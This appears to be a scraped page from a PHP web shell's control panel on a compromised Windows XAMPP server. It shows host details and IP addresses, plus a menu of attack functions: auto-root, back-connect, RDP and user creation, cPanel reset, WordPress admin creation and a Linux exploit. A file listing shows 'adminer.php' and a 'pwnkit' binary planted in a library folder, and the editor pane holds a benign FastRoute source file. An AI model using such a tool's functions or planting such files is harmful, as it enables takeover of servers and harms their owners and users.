Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
vendor /
nikic /
fast-route /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
DataGenerator
[ DIR ]
drwxrwxrwx
Dispatcher
[ DIR ]
drwxrwxrwx
RouteParser
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
BadRouteException.php
81
B
-rw-rw-rw-
DataGenerator.php
682
B
-rw-rw-rw-
Dispatcher.php
594
B
-rw-rw-rw-
Route.php
921
B
-rw-rw-rw-
RouteCollector.php
3.77
KB
-rw-rw-rw-
RouteParser.php
1.01
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
bootstrap.php
294
B
-rw-rw-rw-
functions.php
2.49
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php namespace FastRoute; if (!function_exists('FastRoute\simpleDispatcher')) { /** * @param callable $routeDefinitionCallback * @param array $options * * @return Dispatcher */ function simpleDispatcher(callable $routeDefinitionCallback, array $options = []) { $options += [ 'routeParser' => 'FastRoute\\RouteParser\\Std', 'dataGenerator' => 'FastRoute\\DataGenerator\\GroupCountBased', 'dispatcher' => 'FastRoute\\Dispatcher\\GroupCountBased', 'routeCollector' => 'FastRoute\\RouteCollector', ]; /** @var RouteCollector $routeCollector */ $routeCollector = new $options['routeCollector']( new $options['routeParser'], new $options['dataGenerator'] ); $routeDefinitionCallback($routeCollector); return new $options['dispatcher']($routeCollector->getData()); } /** * @param callable $routeDefinitionCallback * @param array $options * * @return Dispatcher */ function cachedDispatcher(callable $routeDefinitionCallback, array $options = []) { $options += [ 'routeParser' => 'FastRoute\\RouteParser\\Std', 'dataGenerator' => 'FastRoute\\DataGenerator\\GroupCountBased', 'dispatcher' => 'FastRoute\\Dispatcher\\GroupCountBased', 'routeCollector' => 'FastRoute\\RouteCollector', 'cacheDisabled' => false, ]; if (!isset($options['cacheFile'])) { throw new \LogicException('Must specify "cacheFile" option'); } if (!$options['cacheDisabled'] && file_exists($options['cacheFile'])) { $dispatchData = require $options['cacheFile']; if (!is_array($dispatchData)) { throw new \RuntimeException('Invalid cache file "' . $options['cacheFile'] . '"'); } return new $options['dispatcher']($dispatchData); } $routeCollector = new $options['routeCollector']( new $options['routeParser'], new $options['dataGenerator'] ); $routeDefinitionCallback($routeCollector); /** @var RouteCollector $routeCollector */ $dispatchData = $routeCollector->getData(); if (!$options['cacheDisabled']) { file_put_contents( $options['cacheFile'], '<?php return ' . var_export($dispatchData, true) . ';' ); } return new $options['dispatcher']($dispatchData); } }
Close